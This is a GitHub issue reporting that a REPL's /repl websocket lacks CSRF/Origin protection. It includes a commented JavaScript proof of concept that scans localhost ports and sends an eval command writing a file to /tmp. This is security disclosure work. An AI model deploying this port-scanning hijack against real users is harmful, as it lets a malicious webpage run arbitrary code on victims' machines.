
The websocket is not protected against CSRF

Open atx opened this issue 9 years ago • 0 comments

The websocket at /repl does not seem to be protected against CSRF (or CSWSH, cross-site WebSocket hijacking, as it is often called). This allows a malicious website to execute arbitrary code on the host running the REPL.

PoC:

// Candidate ports for the REPL's websocket listener (10000..65534). spawn()
// consumes them with Array#pop, so the highest port is tried first.
var ports = [];
// Set once a handshake succeeds; stops the remaining spawn() chain.
var done = false;

for (var i = 10000; i < 65535; i++) {
    ports.push(i);  
}

// Tries the next candidate port. A failed handshake (onerror) simply chains
// to the next port; the first successful open sets `done` and ends the chain.
//
// Defender's note: the browser sends an Origin header with every WebSocket
// handshake, and this one is cross-origin (the page is not served by the
// REPL). A server that compared Origin against its own host, or required a
// per-session token, would refuse it; the report states /repl does neither,
// and that missing check is the defect being demonstrated.
function spawn() {
    if (done || ports.length < 1)
        return;
    var port = ports.pop();
    // Same-origin policy does not stop a page from opening a websocket to
    // localhost; only a server-side Origin/token check would.
    var ws = new WebSocket("ws://localhost:" + port + "/repl");
    ws.onerror = spawn;
    ws.onopen = function() {
        done = true;
        console.log("Connected");
        // Once open, the REPL evaluates whatever the message carries; per the
        // report no authentication precedes this step.
        ws.send(JSON.stringify({"op": "eval", "code": "(spit \"/tmp/file\" \"evil!\")" }))
    }
}

// Start up to 200 connection attempts in parallel; each one that errors out
// continues to the next port through ws.onerror = spawn.
for (var i = 0; i < 200; i++) {
    spawn();
}

atx avatar Mar 30 '16 07:03 atx